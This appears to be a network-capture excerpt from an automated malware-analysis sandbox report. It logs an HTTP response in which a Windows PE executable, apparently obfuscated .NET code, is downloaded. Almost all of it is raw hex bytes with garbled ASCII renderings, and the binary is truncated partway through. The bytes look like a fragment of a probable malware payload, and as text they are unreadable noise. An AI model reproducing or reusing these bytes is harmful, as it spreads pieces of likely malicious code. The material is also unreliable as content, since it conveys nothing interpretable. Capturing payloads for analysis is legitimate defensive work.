                                                                                                                                  X-GUploader-UploadID: ADPycdtAUXQOPbnIyWc7HwHE6Jjoo94_slb40xzLLQFjYJIeziMw89M1kSl2_68qrqD8x5Zob-f_ZoOlPr3MafIQeS5oJXYR_w
                                                                                                                                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                  2022-01-11 22:38:26 UTC1INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 6f 79 30 38 39 69 6e 68 62 33 4d 50 25 32 46 69 65 6c 34 72 63 25 32 46 64 41 57 4a 25 32 46 4d 4b 71 48 47 6a 7a 45 66 77 4f 52 65 61 25 32 46 5a 46 48 67 30 43 39 73 59 62 6c 30 69 35 53 6c 6d 53 69 6c 41 41 44 71 61 38 4f 46 31 6f 52 25 32 46 34 73 57 49 63 47 63 48 48 64 4d 33 4f 6c 76 59 55 54 4e 78 63 79 32 66 74 69 6a 5a 43 56 31 7a 58 39 70 59 32 47 76 5a 41 75 32 6a 46 66 64 4e 50 25 32 42 4a 4f 61 6d 78 32 6a 52 4e 67 73 41 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78
                                                                                                                                  Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oy089inhb3MP%2Fiel4rc%2FdAWJ%2FMKqHGjzEfwORea%2FZFHg0C9sYbl0i5SlmSilAADqa8OF1oR%2F4sWIcGcHHdM3OlvYUTNxcy2ftijZCV1zX9pY2GvZAu2jFfdNP%2BJOamx2jRNgsA%3D%3D"}],"group":"cf-nel","max
                                                                                                                                  2022-01-11 22:38:26 UTC2INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 3f 79 2a a2 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 2a 08 00 00 06 00 00 00 00 00 00 ae 49 08 00 00 20 00 00 00 60 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL?y*0*I `@ @
                                                                                                                                  2022-01-11 22:38:26 UTC3INData Raw: 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 1a 28 a9 00 00 06 2a 00 92 28 a9 00 00 06 38 10 00 00 00 72 c2 0c 00 70 80 19 00 00 04 38 00 00 00 00 2a 28 5e 01 00 06 38 e6 ff ff ff 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 12 00 00 00 2a 00 00 00 13 30 0e 00 04 00 00 00 00 00 00 00 00 00 17 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06
                                                                                                                                  Data Ascii: **(*(8rp8*(^8*******(*(**0***(*(*(*(*(*(*(*(*(*(
                                                                                                                                  2022-01-11 22:38:26 UTC4INData Raw: 06 12 05 11 06 09 11 04 1f 0a 1f 11 1f 0b 06 28 92 00 00 06 12 04 11 05 11 06 09 1f 0b 1f 16 1f 0c 06 28 92 00 00 06 12 03 11 04 11 05 11 06 1f 0c 1d 1f 0d 06 28 92 00 00 06 12 06 09 11 04 11 05 1f 0d 1f 0c 1f 0e 06 28 92 00 00 06 12 05 11 06 09 11 04 1f 0e 1f 11 1f 0f 06 28 92 00 00 06 12 04 11 05 11 06 09 1f 0f 1f 16 1f 10 06 28 92 00 00 06 12 03 11 04 11 05 11 06 17 1b 1f 11 06 28 93 00 00 06 12 06 09 11 04 11 05 1c 1f 09 1f 12 06 28 93 00 00 06 12 05 11 06 09 11 04 1f 0b 1f 0e 1f 13 06 28 93 00 00 06 12 04 11 05 11 06 09 16 1f 14 1f 14 06 28 93 00 00 06 12 03 11 04 11 05 11 06 1b 1b 1f 15 06 28 93 00 00 06 12 06 09 11 04 11 05 1f 0a 1f 09 1f 16 06 28 93 00 00 06 12 05 11 06 09 11 04 1f 0f 1f 0e 1f 17 06 28 93 00 00 06 12 04 11 05 11 06 09 1a 1f 14 1f
                                                                                                                                  Data Ascii: (((((((((((((
                                                                                                                                  2022-01-11 22:38:26 UTC6INData Raw: 1a 5b 0b 05 8e 69 8d 16 00 00 01 0c 03 8e 69 1a 5b 0d 16 13 04 16 13 05 16 13 06 06 16 3e 04 00 00 00 07 17 58 0b 16 13 07 16 13 08 38 77 01 00 00 11 08 09 5d 13 09 11 08 1a 5a 13 0a 11 09 1a 5a 13 07 03 11 07 19 58 91 1f 18 62 03 11 07 18 58 91 1f 10 62 60 03 11 07 17 58 91 1e 62 60 03 11 07 91 60 13 05 20 ff 00 00 00 13 0b 16 13 0c 11 08 07 17 59 40 49 00 00 00 06 16 3e 42 00 00 00 16 13 06 11 04 11 05 58 13 04 16 13 0d 38 23 00 00 00 11 0d 16 3e 06 00 00 00 11 06 1e 62 13 06 11 06 05 05 8e 69 17 11 0d 58 59 91 60 13 06 11 0d 17 58 13 0d 11 0d 06 3f d5 ff ff ff 38 2e 00 00 00 11 04 11 05 58 13 04 11 0a 13 07 05 11 07 19 58 91 1f 18 62 05 11 07 18 58 91 1f 10 62 60 05 11 07 17 58 91 1e 62 60 05 11 07 91 60 13 06 11 04 16 13 04 25 28 a1 00 00 06 58 13 04
                                                                                                                                  Data Ascii: [ii[>X8w]ZZXbXb`Xb`` Y@I>BX8#>biXY`X?8.XXbXb`Xb``%(X
                                                                                                                                  2022-01-11 22:38:26 UTC7INData Raw: 5f 5a fe 0c 26 00 1f 0c 64 59 fe 0e 26 00 20 76 c2 00 00 fe 0c 26 00 5a fe 0c 27 00 59 fe 0e 26 00 fe 0c 26 00 fe 0c 26 00 fe 0c 26 00 59 61 fe 0e 2b 00 fe 0c 28 00 fe 0c 28 00 1f 19 62 61 fe 0e 28 00 fe 0c 28 00 fe 0c 29 00 58 fe 0e 28 00 fe 0c 28 00 fe 0c 28 00 1d 62 61 fe 0e 28 00 fe 0c 28 00 fe 0c 2a 00 58 fe 0e 28 00 fe 0c 28 00 fe 0c 28 00 1f 0d 64 61 fe 0e 28 00 fe 0c 28 00 fe 0c 2b 00 58 fe 0e 28 00 fe 0c 29 00 1b 62 fe 0c 29 00 58 fe 0c 29 00 61 fe 0c 28 00 58 fe 0e 28 00 fe 0c 28 00 76 6c 6d 58 13 09 11 0e 11 07 17 59 40 53 00 00 00 11 06 16 3e 4b 00 00 00 11 09 11 0a 61 13 13 16 13 14 38 2e 00 00 00 11 14 16 3e 0c 00 00 00 11 10 1e 62 13 10 11 11 1e 58 13 11 11 08 11 0f 11 14 58 11 13 11 10 5f 11 11 1f 1f 5f 64 d2 9c 11 14 17 58 13 14 11 14 11
                                                                                                                                  Data Ascii: _Z&dY& v&Z'Y&&&&Ya+((ba(()X(((ba((*X(((da((+X()b)X)a(X((vlmXY@S>Ka8.>bXX__dX
                                                                                                                                  2022-01-11 22:38:26 UTC8INData Raw: 71 00 00 04 39 28 00 00 00 11 04 10 04 0e 05 09 7b 72 00 00 04 8e 69 54 0e 04 09 7b 72 00 00 04 8e 69 1f 40 7f 51 00 00 04 28 b0 00 00 06 26 16 2a 06 28 65 00 00 0a 18 5a 11 04 28 6b 00 00 0a 06 28 65 00 00 0a 19 5a 09 7b 72 00 00 04 8e 69 28 6c 00 00 0a 16 13 05 05 20 7d 1d ea 0c 40 0a 00 00 00 7e 6d 00 00 04 39 19 00 00 00 7e 5c 00 00 04 02 03 04 05 0e 04 0e 05 6f 30 01 00 06 13 05 38 06 00 00 00 17 80 6d 00 00 04 11 05 2a 7e 5c 00 00 04 02 03 04 05 0e 04 0e 05 6f 30 01 00 06 2a 00 00 00 0a 1b 2a 00 1b 30 02 00 12 00 00 00 00 00 00 00 17 28 2a 00 00 0a dd 06 00 00 00 26 dd 00 00 00 00 2a 00 00 01 10 00 00 00 00 00 00 0b 0b 00 06 0a 00 00 01 13 30 07 00 53 00 00 00 00 00 00 00 d0 51 00 00 01 28 23 00 00 0a 72 9d 0e 00 70 18 8d 24 00 00 01 25 16 d0 13 00
                                                                                                                                  Data Ascii: q9({riT{ri@Q(&*(eZ(k(eZ{ri(l }@~m9~\o08m*~\o0**0(*&*0SQ(#rp$%
                                                                                                                                  2022-01-11 22:38:26 UTC10INData Raw: 3b 00 00 7c 2e 00 00 f4 36 00 00 08 22 00 00 73 55 00 00 16 37 00 00 07 47 00 00 05 2e 00 00 4f 0b 00 00 28 0a 00 00 94 37 00 00 4f 24 00 00 ff 58 00 00 7d 5a 00 00 c9 2f 00 00 8e 53 00 00 7d 51 00 00 23 15 00 00 39 4e 00 00 e8 22 00 00 bf 3d 00 00 02 4e 00 00 6e 5b 00 00 18 20 00 00 ca 3a 00 00 11 3d 00 00 75 19 00 00 af 57 00 00 fa 19 00 00 c4 0f 00 00 f1 37 00 00 73 57 00 00 f4 07 00 00 9b 0d 00 00 8c 06 00 00 03 4f 00 00 aa 44 00 00 c3 2d 00 00 8d 38 00 00 7a 0e 00 00 78 3f 00 00 66 53 00 00 10 12 00 00 9e 09 00 00 0f 58 00 00 87 49 00 00 75 05 00 00 bc 20 00 00 02 14 00 00 c0 3e 00 00 24 45 00 00 f1 15 00 00 6b 42 00 00 89 3e 00 00 b3 09 00 00 0a 24 00 00 6a 58 00 00 4e 30 00 00 ae 32 00 00 6d 16 00 00 ce 41 00 00 c3 48 00 00 c2 37 00 00 32 29 00 00
                                                                                                                                  Data Ascii: ;|.6"sU7G.O(7O$X}Z/S}Q#9N"=Nn[ :=uW7sWOD-8zx?fSXIu >$EkB>$jXN02mAH72)
                                                                                                                                  2022-01-11 22:38:26 UTC11INData Raw: 00 00 96 19 00 00 1f 3b 00 00 64 47 00 00 4a 06 00 00 f6 06 00 00 6f 09 00 00 08 18 00 00 85 47 00 00 fb 24 00 00 ff 2c 00 00 7f 2c 00 00 30 4d 00 00 9f 31 00 00 c5 4b 00 00 cf 51 00 00 2f 4b 00 00 df 08 00 00 f7 11 00 00 8a 2b 00 00 ea 13 00 00 8f 4d 00 00 32 3b 00 00 0a 20 00 00 6c 0d 00 00 e7 57 00 00 46 13 00 00 ab 2e 00 00 da 31 00 00 87 5b 00 00 ff 15 00 00 a5 3e 00 00 0e 1f 00 00 31 3f 00 00 6d 59 00 00 7b 1a 00 00 e8 46 00 00 b9 2b 00 00 34 17 00 00 27 59 00 00 b4 36 00 00 cf 22 00 00 a0 1a 00 00 50 3f 00 00 05 51 00 00 de 58 00 00 d4 3b 00 00 13 2f 00 00 7f 28 00 00 e3 4c 00 00 8c 36 00 00 76 44 00 00 00 0c 00 00 69 43 00 00 31 21 00 00 9f 4c 00 00 08 5a 00 00 ab 13 00 00 44 51 00 00 d1 18 00 00 cf 57 00 00 49 1a 00 00 17 5b 00 00 74 17 00 00 e6
                                                                                                                                  Data Ascii: ;dGJoG$,,0M1KQ/K+M2; lWF.1[>1?mY{F+4'Y6"P?QX;/(L6vDiC1!LZDQWI[t
                                                                                                                                  2022-01-11 22:38:26 UTC12INData Raw: 02 00 00 00 38 ae fc ff ff 16 13 4d 20 0f 00 00 00 38 a1 fc ff ff 11 65 28 d4 00 00 06 8d 16 00 00 01 16 28 d4 00 00 06 28 f7 00 00 06 20 0c 00 00 00 28 1f 01 00 06 39 7b fc ff ff 26 20 05 00 00 00 38 70 fc ff ff 38 fc fe ff ff 20 10 00 00 00 38 61 fc ff ff 28 d4 00 00 06 1a 40 73 fe ff ff 20 06 00 00 00 28 1e 01 00 06 3a 47 fc ff ff 26 20 03 00 00 00 38 3c fc ff ff 11 65 28 d4 00 00 06 8d 16 00 00 01 16 28 d4 00 00 06 28 f7 00 00 06 20 00 00 00 00 28 1f 01 00 06 3a 16 fc ff ff 26 20 00 00 00 00 38 0b fc ff ff dd 4d 3a 00 00 26 20 00 00 00 00 28 1f 01 00 06 3a 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 30 00 45 01 00 00 00 05 00 00 00 38 00 00 00 00 dd 1b 3a 00 00 20 33 00 00 00 28 1f 01 00 06 3a 5a f0 ff ff 26 20 3b 02 00 00 38 4f f0 ff ff fe 0c
                                                                                                                                  Data Ascii: 8M 8e((( (9{& 8p8 8a(@s (:G& 8<e((( (:& 8M:& (:& 80E8: 3(:Z& ;8O
                                                                                                                                  2022-01-11 22:38:26 UTC14INData Raw: 26 20 39 02 00 00 38 e8 eb ff ff fe 0c 05 00 20 06 00 00 00 20 d1 00 00 00 20 45 00 00 00 59 9c 20 77 01 00 00 28 1e 01 00 06 39 c4 eb ff ff 26 20 7f 01 00 00 38 b9 eb ff ff 28 d4 00 00 06 1a 40 7c 4c 00 00 20 d7 01 00 00 38 a4 eb ff ff 11 23 11 54 61 13 03 20 c4 01 00 00 28 1e 01 00 06 3a 8e eb ff ff 26 20 b6 01 00 00 38 83 eb ff ff 20 e8 00 00 00 20 4d 00 00 00 59 fe 0e 40 00 20 92 00 00 00 38 6a eb ff ff fe 0c 0a 00 20 0c 00 00 00 fe 0c 0e 00 9c 20 ab 00 00 00 38 52 eb ff ff 11 5c 11 18 3f 98 3f 00 00 20 52 02 00 00 28 1f 01 00 06 39 3a eb ff ff 26 20 0c 02 00 00 38 2f eb ff ff fe 0c 0a 00 20 11 00 00 00 fe 0c 0e 00 9c 20 1b 01 00 00 38 17 eb ff ff 12 74 11 6f 7d 72 00 00 04 20 8b 00 00 00 38 04 eb ff ff fe 0c 0a 00 20 11 00 00 00 fe 0c 40 00 9c 20 15
                                                                                                                                  Data Ascii: & 98 EY w(9& 8(@|L 8#Ta (:& 8 MY@ 8j 8R\?? R(9:& 8/ 8to}r 8 @
                                                                                                                                  2022-01-11 22:38:26 UTC15INData Raw: 28 1e 01 00 06 3a 90 e6 ff ff 26 20 ef 01 00 00 38 85 e6 ff ff 12 19 28 70 00 00 0a 28 fe 00 00 06 13 07 20 3f 01 00 00 38 6d e6 ff ff 11 5c 17 58 13 5c 20 57 00 00 00 28 1f 01 00 06 3a 58 e6 ff ff 26 20 f6 00 00 00 38 4d e6 ff ff fe 0c 0a 00 20 13 00 00 00 fe 0c 0e 00 9c 20 13 01 00 00 28 1f 01 00 06 39 30 e6 ff ff 26 20 74 00 00 00 38 25 e6 ff ff 38 b1 13 00 00 20 4e 00 00 00 38 16 e6 ff ff 7e 66 00 00 04 28 ec 00 00 06 28 ed 00 00 06 13 58 20 63 00 00 00 fe 0e 51 00 38 f3 e5 ff ff fe 0c 05 00 20 05 00 00 00 fe 0c 1a 00 9c 20 4d 01 00 00 28 1e 01 00 06 39 da e5 ff ff 26 20 66 01 00 00 38 cf e5 ff ff 20 66 00 00 00 20 03 00 00 00 58 fe 0e 0e 00 20 c7 00 00 00 38 b6 e5 ff ff fe 0c 05 00 20 0f 00 00 00 20 65 00 00 00 20 65 00 00 00 58 9c 20 87 01 00 00 fe
                                                                                                                                  Data Ascii: (:& 8(p( ?8m\X\ W(:X& 8M (90& t8%8 N8~f((X cQ8 M(9& f8 f X 8 e eX
                                                                                                                                  2022-01-11 22:38:26 UTC16INData Raw: 12 00 00 00 20 76 00 00 00 20 65 00 00 00 58 9c 20 83 01 00 00 28 1f 01 00 06 39 22 e1 ff ff 26 20 6b 01 00 00 38 17 e1 ff ff 38 c0 f5 ff ff 20 fa 01 00 00 38 08 e1 ff ff fe 0c 0a 00 20 1c 00 00 00 fe 0c 40 00 9c 20 3a 02 00 00 38 f0 e0 ff ff 20 a2 00 00 00 20 36 00 00 00 59 fe 0e 40 00 20 dc 01 00 00 fe 0e 51 00 38 cf e0 ff ff fe 0c 0a 00 20 02 00 00 00 fe 0c 0e 00 9c 20 35 00 00 00 28 1f 01 00 06 39 b6 e0 ff ff 26 20 02 00 00 00 38 ab e0 ff ff 20 d6 00 00 00 20 47 00 00 00 59 fe 0e 1a 00 20 41 01 00 00 38 92 e0 ff ff 11 75 11 20 17 58 11 07 17 91 9c 20 e4 01 00 00 38 7d e0 ff ff fe 0c 0a 00 20 17 00 00 00 fe 0c 40 00 9c 20 67 02 00 00 38 65 e0 ff ff 11 27 11 78 19 58 91 1f 18 62 11 27 11 78 18 58 91 1f 10 62 60 11 27 11 78 17 58 91 1e 62 60 11 27 11 78
                                                                                                                                  Data Ascii: v eX (9"& k88 8 @ :8 6Y@ Q8 5(9& 8 GY A8u X 8} @ g8e'xXb'xXb`'xXb`'x
                                                                                                                                  2022-01-11 22:38:26 UTC18INData Raw: 00 38 e2 db ff ff 11 23 11 00 58 13 23 20 71 01 00 00 28 1e 01 00 06 3a cc db ff ff 26 20 34 01 00 00 38 c1 db ff ff fe 0c 05 00 20 0f 00 00 00 fe 0c 1a 00 9c 20 37 02 00 00 28 1f 01 00 06 39 a4 db ff ff 26 20 f9 01 00 00 38 99 db ff ff 28 d3 00 00 06 20 13 02 00 00 38 8a db ff ff 11 1b 1b 1f 74 9c 20 81 01 00 00 38 7a db ff ff 16 13 68 20 b7 00 00 00 28 1f 01 00 06 3a 68 db ff ff 26 20 60 02 00 00 38 5d db ff ff fe 0c 0a 00 20 11 00 00 00 20 aa 00 00 00 20 38 00 00 00 59 9c 20 db 01 00 00 38 3e db ff ff 11 4f 11 18 1a 5a 11 09 12 09 28 b0 00 00 06 26 20 9c 02 00 00 38 24 db ff ff 7e 4e 00 00 04 28 0c 01 00 06 13 19 20 e5 00 00 00 38 0e db ff ff 11 60 11 53 3f b1 17 00 00 20 1f 02 00 00 38 fb da ff ff fe 0c 05 00 20 0a 00 00 00 20 87 00 00 00 20 2d 00 00
                                                                                                                                  Data Ascii: 8#X# q(:& 48 7(9& 8( 8t 8zh (:h& `8] 8Y 8>OZ(& 8$~N( 8`S? 8 -
                                                                                                                                  2022-01-11 22:38:26 UTC19INData Raw: 0c 0a 00 20 12 00 00 00 20 6f 00 00 00 20 74 00 00 00 58 9c 20 c1 00 00 00 28 1e 01 00 06 3a 6c d6 ff ff 26 20 71 00 00 00 38 61 d6 ff ff fe 0c 0a 00 20 19 00 00 00 fe 0c 0e 00 9c 20 79 02 00 00 38 49 d6 ff ff 1f 12 13 1d 20 d7 00 00 00 38 3b d6 ff ff 16 13 70 20 a8 00 00 00 28 1f 01 00 06 3a 29 d6 ff ff 26 20 bd 00 00 00 38 1e d6 ff ff 28 f4 00 00 06 25 17 28 f5 00 00 06 11 27 11 13 28 f6 00 00 06 13 3d 20 88 02 00 00 38 fd d5 ff ff fe 0c 0a 00 20 02 00 00 00 fe 0c 40 00 9c 20 52 01 00 00 38 e5 d5 ff ff 11 4c 73 76 00 00 0a 28 d4 00 00 06 1f 40 12 67 28 b0 00 00 06 26 20 59 01 00 00 38 c5 d5 ff ff 20 3e 00 00 00 20 5f 00 00 00 58 fe 0e 0e 00 20 16 00 00 00 28 1e 01 00 06 39 a7 d5 ff ff 26 20 a7 01 00 00 38 9c d5 ff ff fe 0c 05 00 20 01 00 00 00 fe 0c 1a
                                                                                                                                  Data Ascii: o tX (:l& q8a y8I 8;p (:)& 8(%('(= 8 @ R8Lsv(@g(& Y8 > _X (9& 8
                                                                                                                                  2022-01-11 22:38:26 UTC20INData Raw: 01 00 00 38 2e d1 ff ff 11 6e 11 5f 3f 20 30 00 00 20 6b 02 00 00 fe 0e 51 00 38 13 d1 ff ff 38 bb 1f 00 00 20 9a 02 00 00 38 08 d1 ff ff fe 0c 05 00 20 01 00 00 00 20 63 00 00 00 20 56 00 00 00 58 9c 20 8c 00 00 00 38 e9 d0 ff ff 20 f5 00 00 00 20 51 00 00 00 59 fe 0e 0e 00 20 95 01 00 00 38 d0 d0 ff ff fe 0c 0a 00 20 08 00 00 00 20 d6 00 00 00 20 47 00 00 00 59 9c 20 6b 00 00 00 38 b1 d0 ff ff 11 6d 28 f3 00 00 06 13 48 20 34 00 00 00 28 1f 01 00 06 39 99 d0 ff ff 26 20 11 00 00 00 38 8e d0 ff ff 28 d3 00 00 06 20 a5 01 00 00 38 7f d0 ff ff 11 13 1f 0d 11 58 1c 91 9c 20 14 00 00 00 28 1e 01 00 06 39 67 d0 ff ff 26 20 36 02 00 00 38 5c d0 ff ff 11 75 11 1d 18 58 11 07 18 91 9c 20 2b 00 00 00 28 1f 01 00 06 3a 42 d0 ff ff 26 20 3a 00 00 00 38 37 d0 ff ff
                                                                                                                                  Data Ascii: 8.n_? 0 kQ88 8 c VX 8 QY 8 GY k8m(H 4(9& 8( 8X (9g& 68\uX +(:B& :87
                                                                                                                                  2022-01-11 22:38:26 UTC22INData Raw: 01 00 00 00 38 04 00 00 00 fe 0c 49 00 45 02 00 00 00 74 01 00 00 05 00 00 00 38 6f 01 00 00 00 38 30 00 00 00 20 03 00 00 00 38 04 00 00 00 fe 0c 02 00 45 06 00 00 00 05 00 00 00 9f 00 00 00 2b 00 00 00 72 00 00 00 38 00 00 00 53 00 00 00 38 00 00 00 00 11 62 28 e4 00 00 06 3a 61 00 00 00 20 00 00 00 00 28 1e 01 00 06 39 c3 ff ff ff 26 20 01 00 00 00 38 b8 ff ff ff 16 13 57 20 05 00 00 00 38 ab ff ff ff 12 5d 28 72 00 00 0a 7e 6b 00 00 04 40 bc ff ff ff 20 02 00 00 00 38 90 ff ff ff 38 47 00 00 00 20 00 00 00 00 28 1f 01 00 06 3a 7c ff ff ff 26 20 00 00 00 00 38 71 ff ff ff 11 62 28 d9 00 00 06 74 52 00 00 01 28 d0 00 00 06 13 5d 20 04 00 00 00 28 1f 01 00 06 39 4f ff ff ff 26 20 00 00 00 00 38 44 ff ff ff dd 9a 00 00 00 11 62 75 55 00 00 01 13 3a 20 02
                                                                                                                                  Data Ascii: 8IEt8o80 8E+r8S8b(:a (9& 8W 8](r~k@ 88G (:|& 8qb(tR(] (9O& 8DbuU:
                                                                                                                                  2022-01-11 22:38:26 UTC23INData Raw: b0 01 00 00 38 7b c6 ff ff 2a 20 07 00 00 00 20 5a 00 00 00 58 fe 0e 2c 00 20 f0 01 00 00 38 61 c6 ff ff 20 b4 00 00 00 20 3c 00 00 00 59 fe 0e 40 00 20 57 00 00 00 fe 0e 51 00 38 40 c6 ff ff 20 d0 00 00 00 20 45 00 00 00 59 fe 0e 40 00 20 7c 01 00 00 38 2b c6 ff ff 11 6d 28 fb 00 00 06 20 ec 00 00 00 38 1a c6 ff ff fe 0c 0a 00 20 10 00 00 00 20 bc 00 00 00 20 3e 00 00 00 59 9c 20 77 00 00 00 28 1f 01 00 06 3a f6 c5 ff ff 26 20 7d 00 00 00 38 eb c5 ff ff fe 0c 0a 00 20 0f 00 00 00 fe 0c 40 00 9c 20 aa 01 00 00 38 d3 c5 ff ff 12 08 e0 73 71 00 00 0a 16 7e 0a 00 00 0a 28 c8 00 00 06 20 55 00 00 00 38 b6 c5 ff ff fe 0c 0a 00 20 06 00 00 00 fe 0c 0e 00 9c 20 d5 00 00 00 28 1e 01 00 06 3a 99 c5 ff ff 26 20 c6 00 00 00 38 8e c5 ff ff fe 0c 05 00 20 00 00 00 00
                                                                                                                                  Data Ascii: 8{* ZX, 8a <Y@ WQ8@ EY@ |8+m( 8 >Y w(:& }8 @ 8sq~( U8 (:& 8
                                                                                                                                  2022-01-11 22:38:26 UTC24INData Raw: 0e 52 00 38 b9 fe ff ff 11 62 28 d9 00 00 06 74 52 00 00 01 13 0c 20 02 00 00 00 28 1e 01 00 06 3a a0 fe ff ff 26 20 01 00 00 00 38 95 fe ff ff 1a 16 20 6f 76 00 00 20 7c 42 00 00 73 78 00 00 0a 13 77 20 07 00 00 00 38 78 fe ff ff 38 2f ff ff ff 20 08 00 00 00 38 69 fe ff ff 11 0c 28 dd 00 00 06 28 de 00 00 06 11 0c 28 dd 00 00 06 28 df 00 00 06 11 0c 28 dd 00 00 06 28 e0 00 00 06 11 0c 28 dd 00 00 06 28 e1 00 00 06 73 78 00 00 0a 13 76 20 04 00 00 00 28 1f 01 00 06 39 23 fe ff ff 26 20 04 00 00 00 38 18 fe ff ff 11 76 11 77 28 e2 00 00 06 3a 79 fe ff ff 20 09 00 00 00 fe 0e 52 00 38 f8 fd ff ff dd df 09 00 00 11 62 75 55 00 00 01 13 3a 20 03 00 00 00 38 04 00 00 00 fe 0c 42 00 45 04 00 00 00 26 00 00 00 66 00 00 00 47 00 00 00 05 00 00 00 38 21 00 00 00
                                                                                                                                  Data Ascii: R8b(tR (:& 8 ov |Bsxw 8x8/ 8i((((((((sxv (9#& 8vw(:y R8buU: 8BE&fG8!
                                                                                                                                  2022-01-11 22:38:26 UTC26INData Raw: 00 38 cc bb ff ff 20 43 00 00 00 20 57 00 00 00 58 fe 0e 0e 00 20 af 01 00 00 38 b3 bb ff ff 20 ba 00 00 00 20 5b 00 00 00 59 fe 0e 1a 00 20 f9 01 00 00 38 9a bb ff ff 20 ad 00 00 00 20 3d 00 00 00 58 fe 0e 40 00 20 01 00 00 00 28 1f 01 00 06 3a 7c bb ff ff 26 20 09 00 00 00 38 71 bb ff ff fe 0c 0a 00 20 01 00 00 00 20 44 00 00 00 20 50 00 00 00 58 9c 20 8b 01 00 00 28 1e 01 00 06 39 4d bb ff ff 26 20 68 02 00 00 38 42 bb ff ff fe 0c 0a 00 20 0c 00 00 00 20 77 00 00 00 20 14 00 00 00 58 9c 20 be 00 00 00 28 1f 01 00 06 3a 1e bb ff ff 26 20 9d 01 00 00 38 13 bb ff ff 11 1b 17 1f 6c 9c 20 97 01 00 00 38 03 bb ff ff fe 0c 05 00 20 04 00 00 00 20 4e 00 00 00 20 18 00 00 00 59 9c 20 0e 00 00 00 28 1f 01 00 06 3a df ba ff ff 26 20 97 00 00 00 38 d4 ba ff ff fe
                                                                                                                                  Data Ascii: 8 C WX 8 [Y 8 =X@ (:|& 8q D PX (9M& h8B w X (:& 8l 8 N Y (:& 8
                                                                                                                                  2022-01-11 22:38:26 UTC27INData Raw: 72 99 0f 00 70 28 e6 00 00 06 73 39 01 00 06 13 6d 20 15 00 00 00 28 1e 01 00 06 3a 59 b6 ff ff 26 20 11 00 00 00 38 4e b6 ff ff 7e 5c 00 00 04 28 18 01 00 06 20 22 02 00 00 38 3a b6 ff ff 11 01 25 13 71 3a e6 0d 00 00 20 dd 01 00 00 38 26 b6 ff ff fe 0c 05 00 20 01 00 00 00 20 65 00 00 00 20 50 00 00 00 59 9c 20 2b 00 00 00 38 07 b6 ff ff fe 0c 0a 00 20 15 00 00 00 fe 0c 0e 00 9c 20 19 00 00 00 28 1e 01 00 06 39 ea b5 ff ff 26 20 15 01 00 00 38 df b5 ff ff 1f 10 13 20 20 57 02 00 00 38 d1 b5 ff ff 28 05 01 00 06 11 1b 28 06 01 00 06 13 21 20 29 01 00 00 38 b9 b5 ff ff fe 0c 05 00 20 09 00 00 00 fe 0c 1a 00 9c 20 46 01 00 00 fe 0e 51 00 38 99 b5 ff ff 20 8d 00 00 00 20 2f 00 00 00 59 fe 0e 2c 00 20 60 00 00 00 28 1f 01 00 06 39 7f b5 ff ff 26 20 25 00 00
                                                                                                                                  Data Ascii: rp(s9m (:Y& 8N~\( "8:%q: 8& e PY +8 (9& 8 W8((! )8 FQ8 /Y, `(9& %
                                                                                                                                  2022-01-11 22:38:26 UTC28INData Raw: 67 01 00 00 38 17 b1 ff ff 16 13 00 20 56 00 00 00 28 1f 01 00 06 3a 05 b1 ff ff 26 20 bb 01 00 00 38 fa b0 ff ff 20 30 00 00 00 20 30 00 00 00 58 fe 0e 1a 00 20 aa 00 00 00 38 e1 b0 ff ff 11 27 16 11 27 8e 69 28 ee 00 00 06 20 00 00 00 00 28 1e 01 00 06 39 c6 b0 ff ff 26 20 00 00 00 00 38 bb b0 ff ff 16 e0 13 15 20 e6 00 00 00 38 ad b0 ff ff fe 0c 0a 00 13 27 20 a2 01 00 00 38 9d b0 ff ff 11 75 11 1d 18 58 11 31 18 91 9c 20 02 01 00 00 28 1e 01 00 06 3a 83 b0 ff ff 26 20 1c 00 00 00 38 78 b0 ff ff 20 2f 00 00 00 20 6a 00 00 00 58 fe 0e 40 00 20 6c 00 00 00 fe 0e 51 00 38 57 b0 ff ff fe 0c 05 00 20 08 00 00 00 fe 0c 1a 00 9c 20 25 00 00 00 28 1f 01 00 06 39 3e b0 ff ff 26 20 18 00 